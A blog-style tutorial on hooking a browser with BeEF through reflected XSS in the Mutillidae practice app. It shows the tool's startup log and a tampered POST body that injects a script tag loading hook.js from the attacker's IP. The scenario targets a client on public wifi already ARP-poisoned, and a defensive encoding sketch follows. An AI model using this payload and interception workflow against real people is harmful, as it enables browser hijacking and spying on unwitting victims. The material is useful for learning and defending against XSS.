Client Side Attack: BeEF + XSS

Hi Folks,
Today I want to try using BeEF to do a client-side attack. BeEF is short for The Browser Exploitation Framework; it is a penetration testing tool that focuses on the web browser.

For the vulnerable web application to do XSS against, I use Mutillidae (Web Pen-Test Practice Application); you can download it from here: http://sourceforge.net/projects/mutillidae/

OK, let's do the main action.
The scenario: I'm on public wifi, and I've already done MiTM using ARP poisoning against one of the clients (the victim) and set up Burp Suite to listen on ports 80 and 443.

First, I start my BeEF application:
root@bt:~# cd /pentest/web/beef
root@bt:/pentest/web/beef# ./beef
[23:51:17][*] Browser Exploitation Framework (BeEF)
[23:51:17]    |   Version 0.4.3.6-alpha
[23:51:17]    |   Website http://beefproject.com
[23:51:17]    |   Run 'beef -h' for basic help.
[23:51:17]    |_  Run 'git pull' to update to the latest revision.
[23:51:18][*] BeEF is loading. Wait a few seconds...
[23:51:18][*] 8 extensions loaded:
[23:51:18]    |   Autoloader
[23:51:18]    |   Demos
[23:51:18]    |   Events
[23:51:18]    |   Requester
[23:51:18]    |   Admin UI
[23:51:18]    |   Proxy
[23:51:18]    |   Console
[23:51:18]    |_  XSSRays
[23:51:18][*] 114 modules enabled.
[23:51:18][*] 2 network interfaces were detected.
[23:51:18][+] running on network interface: 127.0.0.1
[23:51:18]    |   Hook URL: http://127.0.0.1:3000/hook.js
[23:51:18]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[23:51:18][+] running on network interface: 192.168.0.148
[23:51:18]    |   Hook URL: http://192.168.0.148:3000/hook.js
[23:51:18]    |_  UI URL:   http://192.168.0.148:3000/ui/panel
[23:51:18][*] RESTful API key: 9a9fc7d8f75241c5b4d1a86eb400d81e80bb4adb
[23:51:18][*] HTTP Proxy: http://127.0.0.1:6789
[23:51:18][*] BeEF server started (press control+c to stop)



To get the victim into the BeEF panel, I need to insert "hook.js"; that's why I need to use XSS for this.
When the victim opens a web application that is vulnerable to XSS (in this scenario, set-background-color.php), I change the $_POST data to insert the "hook.js" JavaScript to activate the BeEF function.


You can see the last line:
background_color=aaaaaaa&set-background-color-php-submit-button=Set+Background+Color

I change it to:
background_color=aaaaaaa<script src="http://192.168.10.20:3000/hook.js" type="text/javascript"></script>&set-background-color-php-submit-button=Set+Background+Color

Then I forward the data. After that, I open the BeEF panel at: http://127.0.0.1:3000/ui/panel


Voila..!! I got the victim's browser.
For more information about BeEF you can go here: http://beefproject.com/
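
The hook only loads because the application echoes background_color back into the page unencoded. The sketch below is an added example, not code from this post or from Mutillidae (which is written in PHP): it replays the two request bodies shown above through a raw reflection and through a version that allowlists and HTML-encodes the value. The function names, the echo template and the colour allowlist are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Assumption: the field only ever needs a colour name or a hex value.
COLOR_RE = re.compile(r"[A-Za-z]{1,20}|#?[0-9A-Fa-f]{3,8}")

# Sample bodies constructed from the two requests shown in the post.
ORIGINAL_BODY = ("background_color=aaaaaaa"
                 "&set-background-color-php-submit-button=Set+Background+Color")
TAMPERED_BODY = ('background_color=aaaaaaa<script src="http://192.168.10.20:3000/hook.js" '
                 'type="text/javascript"></script>'
                 "&set-background-color-php-submit-button=Set+Background+Color")

def read_color(body):
    """Return the submitted background_color value, or '' if it is absent."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("background_color", [""])[0]

def render_vulnerable(body):
    """Reflect the raw value into HTML: the behaviour the post relies on."""
    return "<p>The current background color is %s</p>" % read_color(body)

def render_hardened(body):
    """Reject values outside the allowlist and HTML-encode anything echoed."""
    color = read_color(body)
    encoded = html.escape(color, quote=True)
    if not COLOR_RE.fullmatch(color):
        return "<p>Invalid color: %s</p>" % encoded
    return "<p>The current background color is %s</p>" % encoded

def has_script_tag(markup):
    """True if the markup contains a live <script> element."""
    return re.search(r"<\s*script\b", markup, re.IGNORECASE) is not None

if __name__ == "__main__":
    for name, body in (("original", ORIGINAL_BODY), ("tampered", TAMPERED_BODY)):
        print(name,
              "| raw reflection carries script:", has_script_tag(render_vulnerable(body)),
              "| hardened carries script:", has_script_tag(render_hardened(body)))
```

Encoding on output is what stops the injected tag from executing; the allowlist is a second layer that rejects the request before anything is rendered.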

One Response so far.

  1. Anonymous says:

    That is cool, that's all I have to say.
